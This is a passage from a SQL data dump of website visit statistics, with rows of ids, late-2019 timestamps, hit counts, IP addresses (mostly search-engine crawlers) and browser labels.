1,1,0,0,'66.249.70.62','chrome'),(471691,1577489215,1,1,0,0,'178.154.171.134','other'),(471692,1577489422,1,1,0,0,'157.55.39.179','other'),(471693,1577489510,5,5,0,0,'66.249.64.26','chrome'),(471694,1577489696,1,1,0,0,'66.249.64.28','chrome'),(471695,1577492614,1,1,0,0,'8.29.198.26','other'),(471696,1577493402,1,1,0,0,'8.29.198.25','other'),(471697,1577493487,1,1,0,0,'66.249.64.27','chrome'),(471698,1577494064,1,1,0,0,'66.249.64.28','chrome'),(471699,1577494372,1,1,0,0,'37.9.113.163','other'),(471700,1577494514,1,1,0,0,'62.205.134.182','other'),(471701,1577494890,1,1,0,0,'178.154.171.134','other'),(471702,1577495030,1,1,0,0,'66.249.64.26','chrome'),(471703,1577495421,1,1,0,0,'66.249.64.28','chrome'),(471704,1577495534,1,1,0,0,'66.249.64.27','chrome'),(471705,1577497222,1,1,0,0,'176.14.240.196','chrome'),(471706,1577497983,1,1,0,0,'178.154.171.134','other'),(471707,1577498185,2,2,0,0,'13.67.109.167','other'),(471708,1577498272,1,1,0,0,'66.249.64.27','chrome'),(471709,1577499052,1,1,0,0,'157.55.39.222','other'),(471710,1577499320,1,1,0,0,'66.249.64.28','chrome'),(471711,1577499779,2,2,0,0,'66.249.70.62','chrome'),(471712,1577500482,1,1,0,0,'66.249.64.28','chrome'),(471713,1577500983,1,1,0,0,'157.55.39.222','other'),(471714,1577501149,1,1,0,0,'207.46.13.161','other'),(471715,1577501541,1,1,0,0,'209.17.96.202','other'),(471716,1577501813,1,1,0,0,'178.154.171.134','other'),(471717,1577501821,1,1,0,0,'34.222.29.253','chrome'),(471718,1577501825,1,1,0,0,'52.41.211.72','other'),(471719,1577502985,1,1,0,0,'157.55.39.222','other'),(471720,1577503394,1,1,0,0,'178.154.171.134','other'),(471721,1577503482,1,1,0,0,'8.29.198.27','other'),(471722,1577503578,2,0,2,0,'157.55.39.179',''),(471723,1577503869,1,1,0,0,'66.249.64.27','chrome'),(471724,1577504180,1,1,0,0,'207.46.13.161','other'),(471725,1577504266,1,1,0,0,'8.29.198.26','other'),(471726,1577504411,1,1,0,0,'5.45.207.65','other'),(471727,1577504754,2,2,0,0,'178.154.171.134','other'),(471728,1577504770,1,1,0,0,'178.154.171.127','other'),(471729,1577505953,1,1,0,0,'66.249.70.36','chrome'),(471730,1577506116,6,6,0,0,'66.249.64.26','chrome'),(471731,1577506266,2,2,0,0,'66.249.64.27','chrome'),(471732,1577506399,1,1,0,0,'66.249.64.28','chrome'),(471733,1577507170,1,1,0,0,'178.154.171.127','other'),(471734,1577507315,1,1,0,0,'178.154.171.134','other'),(471735,1577507844,1,1,0,0,'157.55.39.222','other'),(471736,1577508245,1,1,0,0,'46.211.143.111','chrome'),(471737,1577508969,1,1,0,0,'8.208.20.89','chrome'),(471738,1577509774,1,1,0,0,'178.154.171.134','other'),(471739,1577509792,1,1,0,0,'207.46.13.161','other'),(471740,1577510080,1,1,0,0,'66.249.64.26','chrome'),(471741,1577510861,1,1,0,0,'66.249.64.27','chrome'),(471742,1577510887,1,1,0,0,'128.74.201.145','other'),(471743,1577511144,2,2,0,0,'178.154.171.134','other'),(471744,1577511202,1,1,0,0,'207.46.13.161','other'),(471745,1577511438,1,1,0,0,'91.196.178.102','chrome'),(471746,1577511874,1,1,0,0,'62.205.134.182','other'),(471747,1577511932,1,1,0,0,'66.249.64.28','chrome'),(471748,1577512109,1,0,1,0,'66.249.64.26',''),(471749,1577512552,1,1,0,0,'178.154.171.134','other'),(471750,1577512796,1,1,0,0,'178.154.171.127','other'),(471751,1577513530,1,1,0,0,'66.249.70.62','chrome'),(471752,1577513661,1,1,0,0,'66.249.64.27','chrome'),(471753,1577513730,1,1,0,0,'66.249.64.28','chrome'),(471754,1577514093,1,1,0,0,'207.46.13.83','other'),(471755,1577514333,1,1,0,0,'8.29.198.26','other'),(471756,1577514583,2,2,0,0,'66.249.64.27','chrome'),(471757,1577514864,1,1,0,0,'66.249.64.28','chrome'),(471758,1577514937,1,1,0,0,'157.55.39.222','other'),(471759,1577515123,1,1,0,0,'8.29.198.25','other'),(471760,1577516144,1,1,0,0,'66.249.64.26','chrome'),(471761,1577516349,1,1,0,0,'66.249.64.27','chrome'),(471762,1577516535,1,1,0,0,'178.154.171.134','other'),(471763,1577517048,2,2,0,0,'66.249.64.28','chrome'),(471764,1577517052,1,1,0,0,'66.249.64.26','chrome'),(471765,1577517164,1,1,0,0,'207.46.13.161','other'),(471766,1577517388,1,1,0,0,'207.46.13.83','other'),(471767,1577517725,1,1,0,0,'66.249.70.33','chrome'),(471768,1577517978,2,2,0,0,'66.249.64.26','chrome'),(471769,1577518341,1,1,0,0,'66.249.64.27','chrome'),(471770,1577518462,1,1,0,0,'207.46.13.83','other'),(471771,1577518502,1,1,0,0,'31.13.127.17','other'),(471772,1577518504,1,1,0,0,'31.13.127.11','other'),(471773,1577518596,1,1,0,0,'66.249.64.28','chrome'),(471774,1577519293,1,1,0,0,'141.8.142.50','other'),(471775,1577519300,1,1,0,0,'141.8.183.100','other'),(471776,1577520194,1,1,0,0,'66.249.64.28','chrome'),(471777,1577520208,1,1,0,0,'66.249.64.26','chrome'),(471778,1577520286,1,1,0,0,'207.46.13.83','other'),(471779,1577520404,1,1,0,0,'91.196.178.178','chrome'),(471780,1577520437,1,1,0,0,'103.232.120.33','firefox'),(471781,1577520517,1,1,0,0,'157.55.39.172','other'),(471782,1577521102,1,1,0,0,'87.250.224.90','other'),(471783,1577521144,1,1,0,0,'91.196.178.90','chrome'),(471784,1577521473,1,1,0,0,'157.55.39.179','other'),(471785,1577521487,1,1,0,0,'91.206.111.142','other'),(471786,1577521676,1,1,0,0,'157.55.39.172','other'),(471787,1577521724,2,2,0,0,'66.249.64.26','chrome'),(471788,1577522669,1,1,0,0,'66.249.64.26','chrome'),(471789,1577523146,1,1,0,0,'194.44.101.190','chrome'),(471790,1577523158,2,2,0,0,'66.249.64.27','chrome'),(471791,1577523503,1,1,0,0,'66.249.64.28','chrome'),(471792,1577524354,2,2,0,0,'207.46.13.161','other'),(471793,1577524436,1,1,0,0,'137.135.86.130','firefox'),(471794,1577524457,1,1,0,0,'157.55.39.172','other'),(471795,1577525181,1,1,0,0,'8.29.198.25','other'),(471796,1577525278,1,1,0,0,'66.249.64.27','chrome'),(471797,1577525342,1,1,0,0,'66.249.64.28','chrome'),(471798,1577525735,1,1,0,0,'141.8.142.2','other'),(471799,1577525750,1,1,0,0,'66.249.70.62','chrome'),(471800,1577525983,1,1,0,0,'8.29.198.27','other'),(471801,1577526185,1,1,0,0,'207.46.13.83','other'),(471802,1577526818,1,1,0,0,'157.55.39.172','other'),(471803,1577527172,1,1,0,0,'178.154.171.127','other'),(471804,1577527217,1,1,0,0,'66.249.64.27','chrome'),(471805,1577527675,1,1,0,0,'66.249.70.62','chrome'),(471806,1577528052,1,1,0,0,'66.249.64.28','chrome'),(471807,1577528210,1,1,0,0,'157.55.39.172','other'),(471808,1577528493,1,1,0,0,'46.211.141.195','chrome'),(471809,1577529071,1,1,0,0,'157.55.39.179','other'),(471810,1577529251,1,1,0,0,'66.249.64.26','chrome'),(471811,1577529757,1,1,0,0,'207.46.13.83','other'),(471812,1577530454,1,1,0,0,'157.55.39.233','other'),(471813,1577530685,1,1,0,0,'66.249.64.28','chrome'),(471814,1577531025,1,1,0,0,'157.55.39.172','other'),(471815,1577532009,1,1,0,0,'109.74.154.72','chrome'),(471816,1577532338,1,1,0,0,'66.249.64.26','chrome'),(471817,1577532478,1,1,0,0,'157.55.39.233','other'),(471818,1577532811,1,1,0,0,'157.55.39.179','other'),(471819,1577533677,1,1,0,0,'66.249.64.27','chrome'),(471820,1577533865,2,2,0,0,'91.209.11.236','other'),(471821,1577533928,1,1,0,0,'91.196.178.135','chrome'),(471822,1577533963,2,2,0,0,'207.46.13.83','other'),(471823,1577534107,1,1,0,0,'31.13.127.23','other'),(471824,1577534108,1,1,0,0,'31.13.127.14','other'),(471825,1577534113,1,1,0,0,'31.13.115.2','other'),(471826,1577534115,1,1,0,0,'31.13.115.7','other'),(471827,1577534436,1,1,0,0,'178.154.171.134','other'),(471828,1577534591,1,1,0,0,'157.55.39.179','other'),(471829,1577534709,1,1,0,0,'157.55.39.172','other'),(471830,1577534833,1,1,0,0,'91.196.178.135','chrome'),(471831,1577534915,1,1,0,0,'91.209.11.236','other'),(471832,1577535757,1,1,0,0,'207.46.13.83','other'),(471833,1577536024,1,1,0,0,'8.29.198.27','other'),(471834,1577536187,1,1,0,0,'66.249.64.27','chrome'),(471835,1577536775,1,1,0,0,'157.55.39.172','other'),(471836,1577536784,1,1,0,0,'207.46.13.83','other'),(471837,1577536829,1,1,0,0,'8.29.198.25','other'),(471838,1577537317,2,2,0,0,'66.249.64.27','chrome'),(471839,1577537487,3,3,0,0,'66.249.64.26','chrome'),(471840,1577537684,1,1,0,0,'157.55.39.172','other'),(471841,1577537910,1,1,0,0,'157.55.39.233','other'),(471842,1577538761,2,2,0,0,'207.46.13.83','other'),(471843,1577538813,1,1,0,0,'157.55.39.172','other'),(471844,1577539612,2,2,0,0,'66.249.64.26','chrome'),(471845,1577540563,1,1,0,0,'207.46.13.83','other'),(471846,1577541060,1,1,0,0,'66.249.64.28','chrome'),(471847,1577541072,1,1,0,0,'207.46.13.240','other'),(471848,1577541514,1,1,0,0,'157.55.39.233','other'),(471849,1577541636,1,1,0,0,'66.249.64.27','chrome'),(471850,1577541676,1,1,0,0,'91.196.178.162','chrome'),(471851,1577542103,1,1,0,0,'141.8.142.128','other'),(471852,1577542468,1,1,0,0,'37.9.113.33','other'),(471853,1577543443,1,1,0,0,'66.249.64.28','chrome'),(471854,1577543675,1,1,0,0,'66.249.70.33','chrome'),(471855,1577544673,1,1,0,0,'66.249.70.33','chrome'),(471856,1577544676,1,1,0,0,'157.55.39.233','other'),(471857,1577544763,1,1,0,0,'91.196.178.136','firefox'),(471858,1577545111,1,1,0,0,'157.55.39.172','other'),(471859,1577545535,1,1,0,0,'141.8.132.2','other'),(471860,1577545850,1,1,0,0,'207.46.13.83','other'),(471861,1577546404,1,1,0,0,'66.249.64.27','chrome'),(471862,1577546456,2,0,2,0,'157.55.39.172',''),(471863,1577546661,1,1,0,0,'37.55.150.180','chrome'),(471864,1577546719,1,1,0,0,'8.208.20.89','firefox'),(471865,1577546875,2,2,0,0,'8.29.198.27','other'),(471866,1577546977,3,3,0,0,'34.67.61.50','chrome'),(471867,1577546981,2,2,0,0,'66.249.70.33','chrome'),(471868,1577547000,3,3,0,0,'104.198.42.40','chrome'),(471869,1577547016,3,3,0,0,'35.222.100.152','chrome'),(471870,1577547030,2,2,0,0,'34.66.123.13','chrome'),(471872,1577547404,1,1,0,0,'91.196.178.68','firefox'),(471873,1577547947,1,1,0,0,'66.249.70.33','chrome'),(471874,1577547960,1,1,0,0,'66.249.70.36','chrome'),(471875,1577548746,1,1,0,0,'66.249.64.26','chrome'),(471876,1577548927,1,1,0,0,'66.249.64.27','chrome'),(471877,1577549145,1,1,0,0,'66.249.64.28','chrome'),(471878,1577549463,1,1,0,0,'157.55.39.233','other'),(471879,1577550011,3,3,0,0,'66.249.64.26','chrome'),(471880,1577550394,1,1,0,0,'157.55.39.233','other'),(471881,1577550542,1,1,0,0,'66.249.70.62','chrome'),(471882,1577550724,1,1,0,0,'66.249.64.28','chrome'),(471883,1577551667,1,1,0,0,'87.250.224.90','other'),(471884,1577551836,1,1,0,0,'66.249.64.27','chrome'),(471885,1577552202,1,1,0,0,'66.249.64.28','chrome'),(471886,1577552685,2,2,0,0,'157.55.39.172','other'),(471887,1577554374,1,1,0,0,'66.249.70.36','chrome'),(471888,1577555373,1,1,0,0,'157.55.39.172','other'),(471889,1577556211,1,0,1,0,'66.249.70.33',''),(471890,1577556493,1,1,0,0,'66.249.64.27','chrome'),(471891,1577556938,1,1,0,0,'66.249.64.28','chrome'),(471892,1577557715,1,1,0,0,'8.29.198.26','other'),(471893,1577557767,1,1,0,0,'141.8.142.177','other'),(471894,1577558006,1,1,0,0,'37.9.113.10','other'),(471895,1577558526,1,1,0,0,'8.29.198.27','other'),(471896,1577558693,1,1,0,0,'157.55.39.233','other'),(471897,1577558823,1,1,0,0,'66.249.64.28','chrome'),(471898,1577558836,1,1,0,0,'66.249.70.33','chrome'),(471899,1577559772,1,1,0,0,'46.211.225.162','chrome'),(471900,1577560525,1,0,1,0,'66.249.64.26',''),(471901,1577560865,1,1,0,0,'62.205.134.150','msie'),(471902,1577561241,1,1,0,0,'91.196.178.52','chrome'),(471903,1577561654,1,1,0,0,'176.104.57.211','other'),(471904,1577562230,1,1,0,0,'31.13.127.17','other'),(471905,1577562231,1,1,0,0,'31.13.127.5','other'),(471906,1577564011,1,1,0,0,'66.249.64.26','chrome'),(471907,1577564235,1,1,0,0,'157.55.39.172','other'),(471908,1577564461,1,1,0,0,'66.249.64.28','chrome'),(471909,1577564525,1,1,0,0,'66.249.64.27','chrome'),(471910,1577565675,1,1,0,0,'157.55.39.172','other'),(471911,1577565964,1,1,0,0,'66.249.64.27','chrome'),(471912,1577566018,1,1,0,0,'66.249.64.26','chrome'),(471913,1577567398,1,1,0,0,'66.249.64.27','chrome'),(471914,1577567475,1,1,0,0,'66.249.64.26','chrome'),(471915,1577568238,2,2,0,0,'66.249.64.28','chrome'),(471916,1577568395,1,1,0,0,'66.249.64.26','chrome'),(471917,1577568552,1,1,0,0,'8.29.198.27','other'),(471918,1577569382,1,1,0,0,'8.29.198.25','other'),(471919,1577569564,1,1,0,0,'91.196.178.37','chrome'),(471920,1577569670,1,1,0,0,'13.66.139.0','other'),(471921,1577569887,1,1,0,0,'37.9.113.177','other'),(471922,1577570166,1,1,0,0,'157.55.39.172','other'),(471923,1577570387,1,1,0,0,'141.8.188.12','other'),(471924,1577570426,3,3,0,0,'66.249.64.27','chrome'),(471925,1577570454,1,1,0,0,'66.249.70.62','chrome'),(471926,1577570739,3,3,0,0,'66.249.64.28','chrome'),(471927,1577570853,1,1,0,0,'66.249.70.33','chrome'),(471928,1577571538,1,1,0,0,'66.249.64.26','chrome'),(471929,1577571733,2,2,0,0,'66.249.64.28','chrome'),(471930,1577571740,1,1,0,0,'178.154.171.127','other'),(471931,1577571829,4,4,0,0,'66.249.64.27','chrome'),(471932,1577572067,1,1,0,0,'141.8.132.12','other'),(471933,1577572256,1,1,0,0,'66.249.70.33','chrome'),(471934,1577573109,3,3,0,0,'66.249.64.26','chrome'),(471935,1577573364,1,1,0,0,'157.55.39.172','other'),(471936,1577573788,1,1,0,0,'66.249.64.28','chrome'),(471937,1577574010,2,2,0,0,'66.249.64.26','chrome'),(471938,1577574645,1,1,0,0,'157.55.39.85','other'),(471939,1577575469,2,2,0,0,'66.249.64.26','chrome'),(471940,1577575717,1,1,0,0,'66.249.64.28','chrome'),(471941,1577575758,3,3,0,0,'66.249.64.27','chrome'),(471942,1577575826,1,1,0,0,'157.55.39.172','other'),(471943,1577576020,1,1,0,0,'3.94.144.16','chrome'),(471944,1577576085,2,2,0,0,'66.249.70.62','chrome'),(471945,1577576652,2,2,0,0,'66.249.64.26','chrome'),(471946,1577577129,1,1,0,0,'66.249.64.27','chrome'),(471947,1577577649,1,1,0,0,'37.9.113.200','other'),(471948,1577578264,1,1,0,0,'66.249.70.62','chrome'),(471949,1577578673,2,1,1,0,'157.55.39.172',''),(471950,1577578855,1,1,0,0,'157.55.39.85','other'),(471951,1577578926,1,1,0,0,'165.227.66.216','firefox'),(471952,1577578945,1,1,0,0,'141.8.188.12','other'),(471953,1577578956,1,1,0,0,'66.249.64.28','chrome'),(471954,1577579383,1,1,0,0,'66.249.64.27','chrome'),(471955,1577579389,2,2,0,0,'8.29.198.26','other'),(471956,1577579452,2,1,1,0,'157.55.39.172',''),(471957,1577580249,1,1,0,0,'157.55.39.172','other'),(471958,1577580669,1,1,0,0,'95.108.213.61','other'),(471959,1577580914,1,1,0,0,'62.205.134.182','other'),(471960,1577580985,1,1,0,0,'66.249.64.28','chrome'),(471961,1577581209,1,1,0,0,'66.249.64.26','chrome'),(471962,1577581450,3,3,0,0,'66.249.64.27','chrome'),(471963,1577581654,2,2,0,0,'66.249.70.33','chrome'),(471964,1577581815,1,1,0,0,'157.55.39.85','other'),(471965,1577583094,1,1,0,0,'66.249.64.28','chrome'),(471966,1577583461,1,1,0,0,'157.55.39.85','other'),(471967,1577583639,1,1,0,0,'141.8.183.111','other'),(471968,1577584341,3,3,0,0,'66.249.64.27','chrome'),(471969,1577584891,2,2,0,0,'66.249.64.26','chrome'),(471970,1577585153,2,2,0,0,'157.55.39.172','other'),(471971,1577585298,1,1,0,0,'66.249.70.62','chrome'),(471972,1577585917,1,1,0,0,'141.8.142.161','other'),(471973,1577586119,1,1,0,0,'141.8.142.128','other'),(471974,1577588089,1,1,0,0,'141.8.132.19','other'),(471975,1577588384,1,1,0,0,'66.249.64.28','chrome'),(471976,1577588447,2,2,0,0,'66.249.64.27','chrome'),(471977,1577588708,2,0,2,0,'157.55.39.172',''),(471978,1577588710,1,1,0,0,'13.66.139.0','other'),(471979,1577589395,1,1,0,0,'95.108.181.104','other'),(471980,1577589412,1,1,0,0,'141.8.183.100','other'),(471981,1577589695,1,1,0,0,'66.249.64.27','chrome'),(471982,1577589979,2,2,0,0,'66.249.64.28','chrome'),(471983,1577589982,1,1,0,0,'141.8.142.128','other'),(471984,1577590028,1,1,0,0,'54.218.103.60','chrome'),(471985,1577590032,1,1,0,0,'52.34.24.33','other'),(471986,1577590226,2,2,0,0,'8.29.198.27','other'),(471987,1577590303,2,2,0,0,'66.249.70.36','chrome'),(471988,1577590613,1,1,0,0,'66.249.64.27','chrome'),(471989,1577591705,2,2,0,0,'66.249.70.33','chrome'),(471990,1577591860,5,5,0,0,'66.249.64.27','chrome'),(471991,1577591938,5,5,0,0,'66.249.64.26','chrome'),(471992,1577592006,1,1,0,0,'66.249.70.62','chrome'),(471993,1577592133,1,1,0,0,'66.249.64.28','chrome'),(471994,1577592595,1,1,0,0,'37.9.113.10','other'),(471995,1577593783,1,1,0,0,'141.8.188.25','other'),(471996,1577594359,2,2,0,0,'66.249.64.28','chrome'),(471997,1577594367,1,1,0,0,'66.249.64.26','chrome'),(471998,1577595289,2,2,0,0,'66.249.64.27','chrome'),(471999,1577596011,3,3,0,0,'66.249.64.26','chrome'),(472000,1577596140,1,1,0,0,'141.8.142.164','other'),(472001,1577596206,2,2,0,0,'66.249.64.28','chrome'),(472002,1577596905,1,1,0,0,'157.55.39.217','other'),(472003,1577597926,1,1,0,0,'66.249.70.36','chrome'),(472004,1577598177,1,1,0,0,'62.205.134.182','other'),(472005,1577600426,1,1,0,0,'66.249.64.26','chrome'),(472006,1577601053,1,1,0,0,'8.29.198.26','other'),(472007,1577601313,1,1,0,0,'66.249.64.28','chrome'),(472008,1577601417,1,1,0,0,'66.249.64.27','chrome'),(472009,1577601948,1,1,0,0,'8.29.198.27','other'),(472010,1577602699,1,1,0,0,'46.211.247.43','chrome'),(472011,1577603700,1,1,0,0,'94.103.95.53','chrome'),(472012,1577604135,1,0,1,0,'66.249.70.36',''),(472013,1577604632,3,3,0,0,'66.249.64.28','chrome'),(472014,1577604904,1,1,0,0,'66.249.70.62','chrome'),(472015,1577605940,2,2,0,0,'66.249.64.26','chrome'),(472016,1577605949,1,1,0,0,'66.249.64.27','chrome'),(472017,1577606939,1,1,0,0,'66.249.64.27','chrome'),(472018,1577607805,1,1,0,0,'141.8.183.18','other'),(472019,1577608087,1,1,0,0,'66.249.64.27','chrome'),(472020,1577608700,1,1,0,0,'66.249.64.28','chrome'),(472021,1577609105,1,1,0,0,'91.196.178.185','chrome'),(472022,1577609694,1,1,0,0,'51.68.152.26','chrome'),(472023,1577611071,1,1,0,0,'37.9.113.202','other'),(472024,1577611149,1,1,0,0,'37.9.113.10','other'),(472025,1577611204,1,1,0,0,'109.70.106.130','other'),(472026,1577611885,1,1,0,0,'66.249.64.28','chrome'),(472027,1577611897,1,1,0,0,'8.29.198.25','other'),(472028,1577611925,2,2,0,0,'157.55.39.217','other'),(472029,1577612223,1,1,0,0,'141.8.183.100','other'),(472030,1577612794,1,1,0,0,'8.29.198.26','other'),(472031,1577613176,1,1,0,0,'37.9.113.10','other'),(472032,1577613206,1,1,0,0,'141.8.132.2','other'),(472033,1577613669,1,1,0,0,'66.249.70.36','chrome'),(472034,1577613674,1,1,0,0,'66.249.64.28','chrome'),(472035,1577613774,2,2,0,0,'66.249.64.26','chrome'),(472036,1577614571,1,1,0,0,'5.45.207.65','other'),(472037,1577615063,1,1,0,0,'66.249.64.28','chrome'),(472038,1577615406,1,1,0,0,'141.8.183.111','other'),(472039,1577615542,1,1,0,0,'31.13.127.20','other'),(472040,1577615543,3,3,0,0,'31.13.127.6','other'),(472046,1577615573,2,2,0,0,'31.13.127.9','other'),(472055,1577615574,1,1,0,0,'31.13.127.14','other'),(472056,1577615594,2,2,0,0,'31.13.127.15','other'),(472057,1577615595,2,2,0,0,'31.13.127.11','other'),(472061,1577615596,3,3,0,0,'31.13.127.5','other'),(472062,1577615867,3,3,0,0,'66.249.64.27','chrome'),(472063,1577616058,1,1,0,0,'66.249.70.33','chrome'),(472064,1577616791,1,1,0,0,'157.55.39.217','other'),(472065,1577617723,1,1,0,0,'178.154.171.127','other'),(472066,1577617841,2,2,0,0,'66.249.64.28','chrome'),(472067,1577617926,1,1,0,0,'109.74.154.72','chrome'),(472068,1577618159,1,1,0,0,'66.249.64.27','chrome'),(472069,1577618748,1,1,0,0,'141.8.142.50','other'),(472070,1577618908,1,1,0,0,'66.249.64.26','chrome'),(472071,1577619148,2,2,0,0,'66.249.64.27','chrome'),(472072,1577619857,2,2,0,0,'157.55.39.217','other'),(472073,1577620288,1,1,0,0,'66.249.70.62','chrome'),(472074,1577620566,1,1,0,0,'103.129.97.56','firefox'),(472075,1577621571,1,1,0,0,'178.154.171.134','other'),(472076,1577621588,2,2,0,0,'66.249.64.27','chrome'),(472077,1577622097,1,1,0,0,'157.55.39.217','other'),(472078,1577622727,1,1,0,0,'8.29.198.25','other'),(472079,1577623362,1,1,0,0,'141.8.142.132','other'),(472080,1577623637,1,1,0,0,'8.29.198.25','other'),(472081,1577623661,1,1,0,0,'141.8.142.50','other'),(472082,1577623689,1,1,0,0,'157.55.39.67','other'),(472083,1577624410,1,1,0,0,'141.8.132.37','other'),(472084,1577624484,1,1,0,0,'141.8.142.119','other'),(472085,1577625232,1,1,0,0,'157.55.39.67','other'),(472086,1577626559,1,1,0,0,'141.8.183.33','other'),(472087,1577628794,1,1,0,0,'157.55.39.217','other'),(472088,1577630330,1,1,0,0,'141.8.132.2','other'),(472089,1577630660,1,1,0,0,'13.66.139.0','other'),(472090,1577631308,1,1,0,0,'141.8.142.164','other'),(472091,1577633160,1,1,0,0,'141.8.142.128','other'),(472092,1577633164,1,1,0,0,'141.8.142.132','other'),(472093,1577633615,1,1,0,0,'8.29.198.26','other'),(472094,1577634469,1,1,0,0,'8.29.198.25','other'),(472095,1577634607,1,1,0,0,'141.8.183.33','other'),(472096,1577635883,1,1,0,0,'141.8.183.15','other'),(472097,1577638355,3,1,2,0,'157.55.39.67',''),(472098,1577638764,1,1,0,0,'66.249.64.28','chrome'),(472099,1577639415,1,1,0,0,'141.8.183.18','other'),(472100,1577640425,1,1,0,0,'66.249.64.28','chrome'),(472101,1577640635,1,1,0,0,'66.249.64.27','chrome'),(472102,1577642252,1,1,0,0,'5.45.207.49','other'),(472103,1577642720,1,1,0,0,'95.108.181.104','other'),(472104,1577642998,1,1,0,0,'5.45.207.65','other'),(472105,1577644298,2,2,0,0,'66.249.64.26','chrome'),(472106,1577644475,1,1,0,0,'8.29.198.26','other'),(472107,1577645028,1,1,0,0,'141.8.142.2','other'),(472108,1577645325,1,1,0,0,'8.29.198.25','other'),(472109,1577645564,1,1,0,0,'66.249.64.26','chrome'),(472110,1577646154,1,1,0,0,'66.249.64.27','chrome'),(472111,1577647057,1,1,0,0,'157.55.39.217','other'),(472112,1577649238,1,1,0,0,'66.249.64.27','chrome'),(472113,1577649314,1,1,0,0,'66.249.70.36','chrome'),(472114,1577650566,1,1,0,0,'91.196.178.186','chrome'),(472115,1577651064,1,1,0,0,'178.154.171.134','other'),(472116,1577651641,1,1,0,0,'13.66.139.0','other'),(472117,1577651646,1,1,0,0,'207.46.13.196','other'),(472118,1577651914,1,1,0,0,'157.55.39.181','other'),(472119,1577653191,1,1,0,0,'207.46.13.196','other'),(472120,1577653284,1,1,0,0,'91.196.178.38','chrome'),(472121,1577653846,1,1,0,0,'141.8.183.15','other'),(472122,1577654734,1,1,0,0,'37.9.113.177','other'),(472123,1577654826,1,1,0,0,'207.46.13.196','other'),(472124,1577655122,1,1,0,0,'91.196.178.38','chrome'),(472125,1577655159,1,1,0,0,'157.55.39.217','other'),(472126,1577655161,1,1,0,0,'157.55.39.181','other'),(472127,1577655309,2,2,0,0,'8.29.198.26','other'),(472128,1577656642,1,1,0,0,'207.46.13.196','other'),(472129,1577656920,1,1,0,0,'178.154.171.127','other'),(472130,1577656924,1,1,0,0,'178.154.171.134','other'),(472131,1577657418,1,1,0,0,'13.66.139.0','other'),(472132,1577657495,1,1,0,0,'153.150.32.65','firefox'),(472133,1577657891,1,1,0,0,'37.9.113.33','other'),(472134,1577657989,2,2,0,0,'157.55.39.217','other'),(472135,1577659160,1,1,0,0,'141.8.142.119','other'),(472136,1577659743,2,2,0,0,'207.46.13.196','other'),(472137,1577661646,1,1,0,0,'15.185.52.31','firefox'),(472138,1577662040,1,1,0,0,'178.154.171.134','other'),(472139,1577662517,1,1,0,0,'93.74.225.133','firefox'),(472140,1577663080,1,1,0,0,'157.55.39.217','other'),(472141,1577664357,22,22,0,0,'51.254.138.80','other'),(472142,1577664565,4,4,0,0,'51.254.138.80','firefox'),(472143,1577665165,1,1,0,0,'141.8.183.73','other'),(472144,1577665188,1,1,0,0,'141.8.188.12','other'),(472145,1577666027,1,1,0,0,'141.8.142.161','other'),(472146,1577666154,2,2,0,0,'8.29.198.25','other'),(472147,1577667316,1,1,0,0,'62.205.134.182','other'),(472148,1577667750,1,1,0,0,'178.154.171.127','other'),(472149,1577668609,1,1,0,0,'178.154.171.134','other'),(472150,1577669026,1,1,0,0,'66.249.70.33','chrome'),(472151,1577669117,1,1,0,0,'66.249.64.26','chrome'),(472152,1577669687,1,1,0,0,'178.154.171.134','other'),(472153,1577671656,1,1,0,0,'178.154.171.134','other'),(472154,1577673035,1,1,0,0,'66.249.70.36','chrome'),(472155,1577673452,1,1,0,0,'66.249.64.27','chrome'),(472156,1577674539,1,1,0,0,'178.154.171.134','other'),(472157,1577675181,1,1,0,0,'54.187.192.167','chrome'),(472158,1577675184,1,1,0,0,'52.34.24.33','other'),(472159,1577675481,3,3,0,0,'178.154.171.134','other'),(472160,1577676307,1,1,0,0,'91.196.178.135','firefox'),(472161,1577677008,1,1,0,0,'8.29.198.25','other'),(472162,1577677705,1,1,0,0,'66.249.64.28','chrome'),(472163,1577677718,1,1,0,0,'66.249.64.27','chrome'),(472164,1577677854,1,1,0,0,'8.29.198.26','other'),(472165,1577678524,1,1,0,0,'66.249.76.122','chrome'),(472166,1577678667,1,1,0,0,'178.154.171.127','other'),(472167,1577678881,2,2,0,0,'157.55.39.181','other'),(472168,1577679072,2,2,0,0,'207.46.13.196','other'),(472169,1577679612,1,1,0,0,'37.9.113.177','other'),(472170,1577679885,1,1,0,0,'66.249.64.26','chrome'),(472171,1577680207,1,1,0,0,'207.46.13.196','other'),(472172,1577680978,1,1,0,0,'66.249.64.28','chrome'),(472173,1577681092,2,2,0,0,'157.55.39.181','other'),(472174,1577681953,1,1,0,0,'66.249.70.62','chrome'),(472175,1577682455,1,1,0,0,'66.249.64.28','chrome'),(472176,1577683285,1,1,0,0,'66.249.64.27','chrome'),(472177,1577684056,1,1,0,0,'66.249.64.28','chrome'),(472178,1577684290,2,2,0,0,'66.249.64.26','chrome'),(472179,1577684741,1,1,0,0,'62.205.134.182','other'),(472180,1577684829,2,2,0,0,'178.154.171.134','other'),(472181,1577685659,1,1,0,0,'66.249.64.26','chrome'),(472182,1577685747,1,1,0,0,'139.180.222.49','firefox'),(472183,1577685950,1,1,0,0,'178.154.171.127','other'),(472184,1577685952,1,1,0,0,'66.249.64.27','chrome'),(472185,1577686109,1,1,0,0,'157.55.39.181','other'),(472186,1577686536,1,1,0,0,'66.249.70.33','chrome'),(472187,1577686666,2,2,0,0,'66.249.64.26','chrome'),(472188,1577687034,1,1,0,0,'66.249.64.28','chrome'),(472189,1577687876,2,2,0,0,'8.29.198.27','other'),(472190,1577688084,1,1,0,0,'66.249.70.62','chrome'),(472191,1577688090,1,1,0,0,'66.249.64.27','chrome'),(472192,1577688592,2,2,0,0,'66.249.64.26','chrome'),(472193,1577688829,1,1,0,0,'157.55.39.181','other'),(472194,1577688875,1,1,0,0,'178.154.171.134','other'),(472195,1577689474,2,2,0,0,'66.249.64.27','chrome'),(472196,1577689650,2,2,0,0,'66.249.70.36','chrome'),(472197,1577689668,1,1,0,0,'66.249.70.62','chrome'),(472198,1577689977,1,1,0,0,'66.249.64.26','chrome'),(472199,1577690475,1,1,0,0,'66.249.64.28','chrome'),(472200,1577691390,1,1,0,0,'91.196.178.89','firefox'),(472201,1577691820,3,3,0,0,'66.249.64.26','chrome'),(472202,1577691867,2,2,0,0,'66.249.64.27','chrome'),(472203,1577692373,1,1,0,0,'66.249.64.28','chrome'),(472204,1577693282,2,2,0,0,'178.154.171.134','other'),(472205,1577693377,2,2,0,0,'66.249.64.26','chrome'),(472206,1577693584,4,4,0,0,'66.249.64.27','chrome'),(472207,1577693835,1,1,0,0,'66.249.64.28','chrome'),(472208,1577695324,1,